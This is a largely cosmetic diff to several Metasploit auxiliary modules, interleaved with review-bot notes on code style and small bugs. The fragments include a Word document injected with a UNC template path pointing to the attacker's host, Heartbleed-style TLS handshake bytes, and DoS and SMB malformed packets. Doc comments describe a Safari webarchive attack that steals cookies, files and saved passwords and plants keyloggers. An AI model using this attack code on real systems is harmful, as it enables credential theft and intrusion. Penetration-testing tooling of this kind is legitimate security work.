@ -135,16 +135,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return nil
|
||||
end
|
||||
|
||||
#update the files that contain the injection and reference
|
||||
# update the files that contain the injection and reference
|
||||
zip_data["word/settings.xml"] = file_content
|
||||
zip_data["word/_rels/settings.xml.rels"] = @rels_file_data
|
||||
#lets zip the file
|
||||
# lets zip the file
|
||||
zip_docx(zip_data)
|
||||
end
|
||||
return 0
|
||||
end
|
||||
|
||||
#making the actual docx from the hash
|
||||
# making the actual docx from the hash
|
||||
def zip_docx(zip_data)
|
||||
docx = Rex::Zip::Archive.new
|
||||
zip_data.each_pair do |k,v|
|
||||
@ -153,11 +153,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
file_create(docx.pack)
|
||||
end
|
||||
|
||||
#unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way
|
||||
# unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way
|
||||
def unzip_docx
|
||||
#Ruby sometimes corrupts the document when manipulating inside a compressed document, so we extract it with Zip::File
|
||||
# Ruby sometimes corrupts the document when manipulating inside a compressed document, so we extract it with Zip::File
|
||||
vprint_status("Extracting #{datastore['SOURCE']} into memory.")
|
||||
#we read it all into memory
|
||||
# we read it all into memory
|
||||
zip_data = Hash.new
|
||||
begin
|
||||
Zip::File.open(datastore['SOURCE']) do |filezip|
|
||||
@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
def run
|
||||
#we need this in make_new_file and manipulate_file
|
||||
# we need this in make_new_file and manipulate_file
|
||||
@rels_file_data = ""
|
||||
@rels_file_data << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>".chomp
|
||||
@rels_file_data << "<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\">".chomp
|
||||
@ -182,11 +182,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
@rels_file_data << "attachedTemplate\" Target=\"file://\\\\#{datastore['LHOST']}\\normal.dot\" TargetMode=\"External\"/></Relationships>"
|
||||
|
||||
if "#{datastore['SOURCE']}" == ""
|
||||
#make an empty file
|
||||
# make an empty file
|
||||
print_status("Creating empty document that points to #{datastore['LHOST']}.")
|
||||
make_new_file
|
||||
else
|
||||
#extract the word/settings.xml and edit in the reference we need
|
||||
# extract the word/settings.xml and edit in the reference we need
|
||||
print_status("Injecting UNC path into existing document.")
|
||||
if manipulate_file.nil?
|
||||
print_error("Failed to create a document from #{datastore['SOURCE']}.")
|
||||
|
@ -58,8 +58,8 @@ class Metasploit4 < Msf::Auxiliary
|
||||
}
|
||||
|
||||
# XXX: There is rarely, if ever, a need for a 'for' loop in Ruby
|
||||
# This should be rewritten with 1.upto() or Enumerable#each or
|
||||
# something
|
||||
# This should be rewritten with 1.upto() or Enumerable#each or
|
||||
# something
|
||||
for x in 1..datastore['RLIMIT']
|
||||
print_status("Sending request #{x} to #{peer}")
|
||||
begin
|
||||
|
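Review bot: the `for x in 1..datastore['RLIMIT']` loop flagged by the comment is still there; `1.upto(datastore['RLIMIT']) do |x|` is the one-line replacement (the closing `end`, outside this hunk, stays as is) and it also stops `x` from leaking into the method scope. Once that is done the two reminder comment lines can go. The enclosing method starts before and ends after the hunk.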
@ -21,9 +21,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Steve Jones', #original discoverer
|
||||
'Hoagie <andi[at]void.at>', #original public exploit
|
||||
'Paulino Calderon <calderon[at]websec.mx>', #metasploit module
|
||||
'Steve Jones', # original discoverer
|
||||
'Hoagie <andi[at]void.at>', # original public exploit
|
||||
'Paulino Calderon <calderon[at]websec.mx>', # metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
|
@ -51,9 +51,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
dcerpc_bind(handle)
|
||||
print_status("Bound to #{handle} ...")
|
||||
|
||||
# Linux: Needs heap magic to work around glibc (or TALLOC mode for 3.0.20+)
|
||||
# Linux: Needs heap magic to work around glibc (or TALLOC mode for 3.0.20+)
|
||||
# Mac OS X: PC control via memcpy to stack ptr
|
||||
# Solaris: PC control via memcpy to stack ptr
|
||||
# Solaris: PC control via memcpy to stack ptr
|
||||
|
||||
stub = lsa_open_policy(dcerpc)
|
||||
stub << NDR.long(1)
|
||||
|
@ -42,32 +42,32 @@ class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
def run
|
||||
# Client Hello
|
||||
p1 = "\x16" # Content Type: Handshake
|
||||
p1 = "\x16" # Content Type: Handshake
|
||||
p1 << "\x03\x01" # Version: TLS 1.0
|
||||
p1 << "\x00\x7e" # Length: 126
|
||||
p1 << "\x01" # Handshake Type: Client Hello
|
||||
p1 << "\x01" # Handshake Type: Client Hello
|
||||
p1 << "\x00\x00\x7a" # Length: 122
|
||||
p1 << "\x03\x02" # Version: TLS 1.1
|
||||
p1 << ("A" * 32) # Random
|
||||
p1 << "\x00" # Session ID Length: 0
|
||||
p1 << "\x00" # Session ID Length: 0
|
||||
p1 << "\x00\x08" # Cypher Suites Length: 6
|
||||
p1 << "\xc0\x13" # - ECDHE-RSA-AES128-SHA
|
||||
p1 << "\x00\x39" # - DHE-RSA-AES256-SHA
|
||||
p1 << "\x00\x35" # - AES256-SHA
|
||||
p1 << "\x00\xff" # - EMPTY_RENEGOTIATION_INFO_SCSV
|
||||
p1 << "\x01" # Compression Methods Length: 1
|
||||
p1 << "\x00" # - NULL-Compression
|
||||
p1 << "\x01" # Compression Methods Length: 1
|
||||
p1 << "\x00" # - NULL-Compression
|
||||
p1 << "\x00\x49" # Extensions Length: 73
|
||||
p1 << "\x00\x0b" # - Extension: ec_point_formats
|
||||
p1 << "\x00\x04" # Length: 4
|
||||
p1 << "\x03" # EC Points Format Length: 3
|
||||
p1 << "\x00" # - uncompressed
|
||||
p1 << "\x01" # - ansiX962_compressed_prime
|
||||
p1 << "\x02" # - ansiX962_compressed_char2
|
||||
p1 << "\x03" # EC Points Format Length: 3
|
||||
p1 << "\x00" # - uncompressed
|
||||
p1 << "\x01" # - ansiX962_compressed_prime
|
||||
p1 << "\x02" # - ansiX962_compressed_char2
|
||||
p1 << "\x00\x0a" # - Extension: elliptic_curves
|
||||
p1 << "\x00\x34" # Length: 52
|
||||
p1 << "\x00\x32" # Elliptic Curves Length: 50
|
||||
# 25 Elliptic curves:
|
||||
# 25 Elliptic curves:
|
||||
p1 << "\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\x09\x00\x0a"
|
||||
p1 << "\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04"
|
||||
p1 << "\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10"
|
||||
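Review bot: the comment `# Cypher Suites Length: 6` contradicts the bytes: `\x00\x08` followed by four two-byte suites is 8 bytes, and the surrounding length fields (122 for the handshake, 73 for the extensions) only add up with 8. Change it to `# Cipher Suites Length: 8`; the `-97` hunk has a similar slip in `# Encrypted PresMaster (irrelevant)`, which should read `PreMaster`. `run` continues past this hunk.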
@ -77,7 +77,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||
p1 << "\x00\x00" # Length: 0
|
||||
p1 << "\x00\x0f" # - Extension: Heartbeat
|
||||
p1 << "\x00\x01" # Length: 1
|
||||
p1 << "\x01" # Peer allowed to send requests
|
||||
p1 << "\x01" # Peer allowed to send requests
|
||||
|
||||
|
||||
# Change Cipher Spec Message
|
||||
@ -97,12 +97,12 @@ class Metasploit4 < Msf::Auxiliary
|
||||
# Client Key Exchange, Change Cipher Spec, Encrypted Handshake
|
||||
# AES256-SHA
|
||||
p2_aes_sha = "\x16" # Content Type: Handshake
|
||||
p2_aes_sha << "\x03\x02" # Version: TLS 1.1
|
||||
p2_aes_sha << "\x01\x06" # Length: 262
|
||||
p2_aes_sha << "\x03\x02" # Version: TLS 1.1
|
||||
p2_aes_sha << "\x01\x06" # Length: 262
|
||||
p2_aes_sha << "\x10" # Handshake Type: Client Key Exchange
|
||||
p2_aes_sha << "\x00\x01\x02" # Length: 258
|
||||
p2_aes_sha << "\x01\x00" # Encrypted PreMaster Length: 256
|
||||
p2_aes_sha << ("\x00" * 256) # Encrypted PresMaster (irrelevant)
|
||||
p2_aes_sha << "\x00\x01\x02" # Length: 258
|
||||
p2_aes_sha << "\x01\x00" # Encrypted PreMaster Length: 256
|
||||
p2_aes_sha << ("\x00" * 256) # Encrypted PresMaster (irrelevant)
|
||||
p2_aes_sha << p2_cssm # Change Cipher Spec Message
|
||||
p2_aes_sha << p2_ehm # Encrypted Handshake Message
|
||||
|
||||
@ -112,7 +112,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||
p2_dhe << "\x03\x02" # Version: TLS 1.1
|
||||
p2_dhe << "\x00\x46" # Length: 70
|
||||
p2_dhe << "\x10" # Handshake Type: Client Key Exchange
|
||||
p2_dhe << "\x00\x00\x42" # Length: 66
|
||||
p2_dhe << "\x00\x00\x42" # Length: 66
|
||||
p2_dhe << "\x00\x40" # DH Pubkey Length: 64
|
||||
p2_dhe << ("A" * 64) # DH Pubkey
|
||||
p2_dhe << p2_cssm # Change Cipher Spec Message
|
||||
@ -124,9 +124,9 @@ class Metasploit4 < Msf::Auxiliary
|
||||
p2_ecdhe << "\x03\x02" # Version: TLS 1.1
|
||||
p2_ecdhe << "\x00\x46" # Length: 70
|
||||
p2_ecdhe << "\x10" # Handshake Type: Client Key Exchange
|
||||
p2_ecdhe << "\x00\x00\x42" # Length: 66
|
||||
p2_ecdhe << "\x00\x00\x42" # Length: 66
|
||||
p2_ecdhe << "\x41" # EC DH Pubkey Length: 65
|
||||
# EC DH Pubkey:
|
||||
# EC DH Pubkey:
|
||||
p2_ecdhe << "\x04\x2f\x22\xf4\x06\x3f\xa1\xf7\x3d\xb6\x55\xbc\x68\x65\x57\xd8"
|
||||
p2_ecdhe << "\x03\xe5\xaa\x36\xeb\x0f\x52\x5a\xaf\xd0\x9f\xf8\xc7\xfe\x09\x69"
|
||||
p2_ecdhe << "\x5b\x38\x95\x58\xb6\x0d\x27\x53\xe9\x63\xcb\x96\xb3\x54\x47\xa6"
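Review bot: The comment on `p1 << "\x00\x08"` in the first hunk says `Cypher Suites Length: 6`, but the length field is 0x0008 and four two-byte suites follow it (c013, 0039, 0035, 00ff), so it should read `# Cipher Suites Length: 8`. The `@ -97,12` hunk has a smaller slip twice: `# Encrypted PresMaster (irrelevant)` should be `# Encrypted PreMaster (irrelevant)`. These byte-by-byte comments are the only documentation of the handshake layout, so a wrong count misleads more than a missing one. `run` starts in the first hunk and ends outside this view.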
|
||||
|
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run
|
||||
#Attempt to crash IIS FTP
|
||||
# Attempt to crash IIS FTP
|
||||
begin
|
||||
return unless connect_login
|
||||
print_status('Checking if there is at least one directory ...')
|
||||
|
@ -21,9 +21,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'x000 <3d3n[at]hotmail.com.br>', #Initial disclosure/exploit
|
||||
'C4SS!0 G0M3S <Louredo_[at]hotmail.com>', #Metasploit submission
|
||||
'sinn3r', #Metasploit edit/commit
|
||||
'x000 <3d3n[at]hotmail.com.br>', # Initial disclosure/exploit
|
||||
'C4SS!0 G0M3S <Louredo_[at]hotmail.com>', # Metasploit submission
|
||||
'sinn3r', # Metasploit edit/commit
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
|
@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run
|
||||
#Send HELLO to target
|
||||
# Send HELLO to target
|
||||
connect_udp
|
||||
print_status("Sending Crash request...")
|
||||
udp_sock.put("HELLO0.83\0")
|
||||
@ -44,13 +44,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
end
|
||||
|
||||
#Send DOS packet
|
||||
# Send DOS packet
|
||||
connect_udp(global = true,'RPORT' => port)
|
||||
print_status("Sending DoS packet to #{rhost}:#{port}...")
|
||||
udp_sock.put("Kthxbai")
|
||||
disconnect_udp
|
||||
|
||||
#Check is target is down
|
||||
# Check is target is down
|
||||
connect_udp
|
||||
print_status("Checking target...")
|
||||
udp_sock.put("HELLO0.83\0")
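Review bot: `connect_udp(global = true,'RPORT' => port)` in the second hunk assigns a throwaway local `global` inside the argument list (Ruby warns "assigned but unused variable"), so the call should be `connect_udp(true, 'RPORT' => port)`; if the assignment was meant to label the positional argument, a trailing comment does that without the side effect. The comment `# Check is target is down` three lines below reads as `# Check if target is down`. `run` starts in the first hunk and ends outside this view.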
|
||||
|
@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
pkt['Payload'].v['DataLenLow'] = dlenlow #<==================
|
||||
pkt['Payload'].v['DataOffset'] = doffset #<====
|
||||
pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc #<====
|
||||
pkt['Payload'].v['ByteCount'] = fillersize#<====
|
||||
pkt['Payload'].v['ByteCount'] = fillersize #<====
|
||||
pkt['Payload'].v['Payload'] = filler
|
||||
|
||||
simple.client.smb_send(pkt.to_s)
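Review bot: The `#<====` markers on the `DataLenLow`, `DataOffset`, `DataOffsetHigh` and `ByteCount` assignments say that these four fields matter without saying why, and the commit only fixes the spacing before one of them. One comment above the block naming what the arrows denote — presumably the header fields deliberately set to inconsistent values, judging by the `0xcccccccc` filler — and dropping the arrows would carry the same information readably; confirm the intent before writing it. The enclosing method starts and ends outside this hunk.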
|
||||
|
@ -40,9 +40,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
delimiter = "\x00"*3
|
||||
packet = [0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,
|
||||
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
|
||||
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
|
||||
0x00, 0x7e].pack("C*")
|
||||
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
|
||||
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
|
||||
0x00, 0x7e].pack("C*")
|
||||
packet << Rex::Text.rand_text_alphanumeric(126)
|
||||
packet << delimiter
|
||||
packet << Rex::Text.rand_text_alphanumeric(16)
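Review bot: The trailing `0x00, 0x7e` of the packed header appears to be a length field for the 126 alphanumeric bytes appended on the next line, but nothing ties the two together, so a later change to `rand_text_alphanumeric(126)` would silently break the packet. A comment such as `# 0x007e = 126, length of the random payload below` on the `0x00, 0x7e].pack("C*")` line, or deriving the field from the payload's `bytesize`, keeps them in step; I am inferring the field's meaning from the matching value, so confirm against the protocol. The enclosing method starts and ends outside this hunk.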
|
||||
|
@ -47,26 +47,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def support_ipv6?
|
||||
false
|
||||
end
|
||||
|
||||
|
||||
#---------------------------------------------------------------------------------
|
||||
|
||||
def setup
|
||||
super
|
||||
@state = {}
|
||||
end
|
||||
|
||||
|
||||
#---------------------------------------------------------------------------------
|
||||
|
||||
def run
|
||||
@fuzzsize=datastore['STARTSIZE'].to_i
|
||||
exploit()
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------
|
||||
# Handler for new FTP client connections
|
||||
#---------------------------------------------------------------------------------
|
||||
|
||||
def on_client_connect(c)
|
||||
@state[c] = {
|
||||
:name => "#{c.peerhost}:#{c.peerport}",
|
||||
@ -75,20 +67,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:user => nil,
|
||||
:pass => nil
|
||||
}
|
||||
#set up an active data port on port 20
|
||||
# set up an active data port on port 20
|
||||
print_status("Client connected : " + c.peerhost)
|
||||
active_data_port_for_client(c, 20)
|
||||
send_response(c,"","WELCOME",220," "+datastore['WELCOME'])
|
||||
#from this point forward, on_client_data() will take over
|
||||
# from this point forward, on_client_data() will take over
|
||||
end
|
||||
|
||||
def on_client_close(c)
|
||||
@state.delete(c)
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------
|
||||
# Active and Passive data connections
|
||||
#---------------------------------------------------------------------------------
|
||||
def passive_data_port_for_client(c)
|
||||
@state[c][:mode] = :passive
|
||||
if(not @state[c][:passive_sock])
|
||||
@ -140,22 +130,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
nil
|
||||
end
|
||||
|
||||
|
||||
|
||||
#---------------------------------------------------------------------------------
|
||||
# FTP Client-to-Server Command handlers
|
||||
#---------------------------------------------------------------------------------
|
||||
|
||||
# FTP Client-to-Server Command handlers
|
||||
def on_client_data(c)
|
||||
#get the client data
|
||||
# get the client data
|
||||
data = c.get_once
|
||||
return if not data
|
||||
#split data into command and arguments
|
||||
# split data into command and arguments
|
||||
cmd,arg = data.strip.split(/\s+/, 2)
|
||||
arg ||= ""
|
||||
|
||||
return if not cmd
|
||||
#convert commands to uppercase and strip spaces
|
||||
# convert commands to uppercase and strip spaces
|
||||
case cmd.upcase.strip
|
||||
|
||||
when 'USER'
|
||||
@ -247,7 +232,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
|
||||
when /^(LIST|NLST|LS)$/
|
||||
#special case - requires active/passive connection
|
||||
# special case - requires active/passive connection
|
||||
print_status("Handling #{cmd.upcase} command")
|
||||
conn = establish_data_connection(c)
|
||||
if(not conn)
|
||||
@ -289,7 +274,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
|
||||
when 'RETR'
|
||||
#special case - requires active/passive connection
|
||||
# special case - requires active/passive connection
|
||||
print_status("Handling #{cmd.upcase} command")
|
||||
conn = establish_data_connection(c)
|
||||
if(not conn)
|
||||
@ -353,11 +338,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
|
||||
#---------------------------------------------------------------------------------
|
||||
# Fuzzer functions
|
||||
#---------------------------------------------------------------------------------
|
||||
|
||||
# Do we need to fuzz this command ?
|
||||
def fuzz_this_cmd(cmd)
|
||||
@ -421,7 +402,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("* Fuzz data sent")
|
||||
incr_fuzzsize()
|
||||
else
|
||||
#Do not fuzz
|
||||
# Do not fuzz
|
||||
cmsg = code.to_s + msg
|
||||
cmsg = cmsg.strip
|
||||
c.put("#{cmsg}\r\n")
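Review bot: `on_client_data` in the `@ -140,22` hunk handles exactly one command per callback — `data = c.get_once` followed by a single `split(/\s+/, 2)` — so if `get_once` returns whatever is currently buffered, two commands arriving in one read are parsed as one command with a garbage argument and a command split across reads becomes two unknown commands; buffering on `\r\n` per client in `@state[c]` would avoid that. I am inferring `get_once`'s semantics from its name, so confirm against the server mixin. Separately, `return if not data` and `return if not cmd` read more idiomatically as `return unless data` and `return unless cmd`, matching the `return unless connect_login` style used elsewhere on this page. `on_client_data` ends outside this hunk.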
|
||||
|
@ -175,14 +175,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
else
|
||||
datastr = "\r\n"
|
||||
end
|
||||
#first, check the original header fields and add some others - just for fun
|
||||
# first, check the original header fields and add some others - just for fun
|
||||
myheaders = @send_data[:headers]
|
||||
mysendheaders = @send_data[:headers].dup
|
||||
#get or post ?
|
||||
# get or post ?
|
||||
mysendheaders[:method] = form[:method].upcase
|
||||
myheaders.each do | thisheader |
|
||||
if not headers[thisheader[0]]
|
||||
#add header if needed
|
||||
# add header if needed
|
||||
mysendheaders[thisheader[0]]= thisheader[1]
|
||||
end
|
||||
end
|
||||
@ -300,7 +300,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def get_field_val(input)
|
||||
tmp = input.split(/\=/)
|
||||
#get delimeter
|
||||
# get delimeter
|
||||
tmp2 = tmp[1].strip
|
||||
delim = tmp2[0,1]
|
||||
if delim != "'" && delim != '"'
|
||||
@ -316,7 +316,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
body = body.gsub("\r","")
|
||||
body = body.gsub("\n","")
|
||||
bodydata = body.downcase.split(/<form/)
|
||||
#we need part after <form
|
||||
# we need part after <form
|
||||
totalforms = bodydata.size - 1
|
||||
print_status(" Number of forms : #{totalforms}")
|
||||
formcnt = 0
|
||||
@ -326,7 +326,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
fdata = bodydata[formidx]
|
||||
print_status(" - Enumerating form ##{formcnt+1}")
|
||||
data = fdata.downcase.split(/<\/form>/)
|
||||
#first, get action and name
|
||||
# first, get action and name
|
||||
formdata = data[0].downcase.split(/>/)
|
||||
subdata = formdata[0].downcase.split(/ /)
|
||||
namefound = false
|
||||
@ -375,7 +375,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
namefound = true
|
||||
|
||||
formfields = []
|
||||
#input boxes
|
||||
# input boxes
|
||||
fieldtypemarks = [ '<input', '<select' ]
|
||||
fieldtypemarks.each do | currfieldmark |
|
||||
formfieldcnt=0
|
||||
@ -386,7 +386,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if subdata.size > 1
|
||||
subdata.each do | thisinput |
|
||||
if skipflag == 1
|
||||
#first, find the delimeter
|
||||
# first, find the delimeter
|
||||
fielddata = thisinput.downcase.split(/>/)
|
||||
fields = fielddata[0].split(/ /)
|
||||
fieldname = ""
|
||||
@ -408,7 +408,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
fieldid = get_field_val(thisfield)
|
||||
end
|
||||
if thisfield.match(/^value=/)
|
||||
#special case
|
||||
# special case
|
||||
location = fielddata[0].index(thisfield)
|
||||
delta = fielddata[0].size - location
|
||||
remaining = fielddata[0][location,delta]
|
||||
@ -518,13 +518,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
formfound = response.body.downcase.index("<form")
|
||||
if formfound
|
||||
formdata = get_form_data(response.body)
|
||||
#fuzz !
|
||||
#for each form that needs to be fuzzed
|
||||
# fuzz !
|
||||
# for each form that needs to be fuzzed
|
||||
formdata.each do | thisform |
|
||||
if thisform[:name].length > 0
|
||||
if ((datastore['FORM'].strip == "") || (datastore['FORM'].upcase.strip == thisform[:name].upcase.strip)) && (thisform[:fields].size > 0)
|
||||
print_status("Fuzzing fields in form #{thisform[:name].upcase.strip}")
|
||||
#for each field in this form, fuzz one field at a time
|
||||
# for each field in this form, fuzz one field at a time
|
||||
formfields = thisform[:fields]
|
||||
formfields.each do | thisfield |
|
||||
if thisfield[:name]
|
||||
@ -537,7 +537,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
print_status("Done fuzzing fields in form #{thisform[:name].upcase.strip}")
|
||||
end
|
||||
#fuzz headers ?
|
||||
# fuzz headers ?
|
||||
if datastore['FUZZHEADERS'] == true
|
||||
print_status("Fuzzing header fields")
|
||||
do_fuzz_headers(thisform,response.headers)
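Review bot: `get_field_val` in the `@ -300,7` hunk calls `tmp[1].strip` without a guard, and `"value=".split(/\=/)` returns `["value"]` because Ruby drops trailing empty fields, so an empty unquoted attribute raises `NoMethodError` on nil and aborts the whole fuzz run. Splitting on every `=` also truncates a value that itself contains `=` (base64 tokens do). `name, rest = input.split(/=/, 2)` followed by `tmp2 = rest.to_s.strip` fixes both while leaving the rest of the method unchanged; the method ends outside this hunk, so check that an empty `delim` takes the unquoted branch as intended.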
|
||||
|
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
rescue ::Exception => e
|
||||
last_err = e
|
||||
#ensure
|
||||
# disconnect
|
||||
#disconnect
|
||||
end
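Review bot: `rescue ::Exception => e` catches `Interrupt`, `SystemExit` and `NoMemoryError` along with the protocol errors it is meant for, so a Ctrl-C during this call is recorded in `last_err` and swallowed instead of stopping the module; `rescue ::StandardError => e` (or `rescue ::Interrupt; raise` placed before it) keeps the intended behaviour. The commented-out `#ensure` / `#disconnect` pair also leaves open who closes the connection on the error path — a comment stating where disconnection happens, or a real `ensure`, would settle it. The enclosing `begin` block and method start outside this hunk.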
|
||||
|
||||
|
||||
|
@ -282,7 +282,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [String] the XML markup to insert into the webarchive for each unique
|
||||
# iframe (we use one frame per site we want to steal)
|
||||
# iframe (we use one frame per site we want to steal)
|
||||
# @return '' if msf user does not want to poison cache
|
||||
def webarchive_resources_for_poisoning_cache(url)
|
||||
if not should_install_keyloggers? then return '' end
|
||||
@ -320,14 +320,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
|
||||
end
|
||||
|
||||
# @param [script] hash containing HTTP headers from the request
|
||||
# @param script [Hash] containing HTTP headers from the request
|
||||
# @return [String] xml markup for serialized WebResourceResponse containing good
|
||||
# stuff like HTTP/caching headers. Safari appears to do the following:
|
||||
# NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
|
||||
# [a encodeObject:response forKey:@"WebResourceResponse"];
|
||||
# stuff like HTTP/caching headers. Safari appears to do the following:
|
||||
# NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
|
||||
# [a encodeObject:response forKey:@"WebResourceResponse"];
|
||||
def web_response_xml(script)
|
||||
# this is a serialized NSHTTPResponse, i'm too lazy to write a
|
||||
# real encoder so yay lets use string interpolation.
|
||||
# real encoder so yay lets use string interpolation.
|
||||
# ripped this straight out of a webarchive save
|
||||
script['content-length'] = script[:body].length
|
||||
whitelist = %w(content-type content-length date etag
|
||||
@ -507,7 +507,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [String] mark up for embedding the iframes for each URL in a place that is
|
||||
# invisible to the user
|
||||
# invisible to the user
|
||||
def iframes_container_html
|
||||
hidden_style = "position:fixed; left:-600px; top:-600px;"
|
||||
wrap_with_doc do
|
||||
@ -517,8 +517,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [String] javascript code, wrapped in script tags, that is inserted into the
|
||||
# WebMainResource (parent) frame so that child frames can communicate "up" to the parent
|
||||
# and send data out to the listener
|
||||
# WebMainResource (parent) frame so that child frames can communicate "up" to the parent
|
||||
# and send data out to the listener
|
||||
def communication_js
|
||||
wrap_with_script do
|
||||
%Q|
|
||||
@ -543,7 +543,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [String] javascript code, wrapped in a script tag, that steals the cookies
|
||||
# and response body/headers, and passes them back up to the parent.
|
||||
# and response body/headers, and passes them back up to the parent.
|
||||
def steal_cookies_for_url(url)
|
||||
wrap_with_script do
|
||||
%Q|
|
||||
@ -568,8 +568,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [String] javascript code, wrapped in a script tag, that steals local files
|
||||
# and sends them back to the listener. This code is executed in the WebMainResource (parent)
|
||||
# frame, which runs in the file:// protocol
|
||||
# and sends them back to the listener. This code is executed in the WebMainResource (parent)
|
||||
# frame, which runs in the file:// protocol
|
||||
def steal_files
|
||||
return '' unless should_steal_files?
|
||||
urls_str = [datastore['FILE_URLS'], interesting_file_urls.join(' ')].join(' ')
|
||||
@ -595,9 +595,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [String] javascript code, wrapped in a script tag, that steals autosaved form
|
||||
# usernames and passwords. The attack first tries to render the target URL in an iframe,
|
||||
# and steal populated passwords from there. If the site disables iframes through the
|
||||
# X-Frame-Options header, we try popping open a new window and rendering the site in that.
|
||||
# usernames and passwords. The attack first tries to render the target URL in an iframe,
|
||||
# and steal populated passwords from there. If the site disables iframes through the
|
||||
# X-Frame-Options header, we try popping open a new window and rendering the site in that.
|
||||
def steal_form_data_for_url(url)
|
||||
wrap_with_script do
|
||||
%Q|
|
||||
@ -663,8 +663,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [String] javascript code, wrapped in script tag, that adds a helper function
|
||||
# called "sendData()" that passes the arguments up to the parent frame, where it is
|
||||
# sent out to the listener
|
||||
# called "sendData()" that passes the arguments up to the parent frame, where it is
|
||||
# sent out to the listener
|
||||
def injected_js_helpers
|
||||
wrap_with_script do
|
||||
%Q|
|
||||
@ -678,7 +678,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [String] HTML markup that includes a script at the URL we want to poison
|
||||
# We will then install the injected_js_keylogger at the same URL
|
||||
# We will then install the injected_js_keylogger at the same URL
|
||||
def trigger_cache_poison_for_url(url)
|
||||
url_idx = urls.index(url)
|
||||
scripts_to_poison[url_idx].map { |s|
|
||||
@ -686,10 +686,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}.join
|
||||
end
|
||||
|
||||
# @param [String] original_js the original contents of the script file
|
||||
# @param original_js [String] the original contents of the script file
|
||||
# @return [String] the poisoned contents. Once the module has found a valid 304'd script to
|
||||
# poison, it "poisons" it by adding a keylogger, then adds the output as a resource with
|
||||
# appropriate Cache-Control to the webarchive.
|
||||
# poison, it "poisons" it by adding a keylogger, then adds the output as a resource with
|
||||
# appropriate Cache-Control to the webarchive.
|
||||
# @return [String] the original contents if msf user does not want to install keyloggers
|
||||
def inject_js_keylogger(original_js)
|
||||
if not should_install_keyloggers?
|
||||
@ -726,7 +726,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
# @return [Array<Array<String>>] list of URLs provided by the user mapped to all of the linked
|
||||
# javascript assets in its HTML response.
|
||||
# javascript assets in its HTML response.
|
||||
def all_script_urls(pages)
|
||||
pages.map do |url|
|
||||
results = []
|
||||
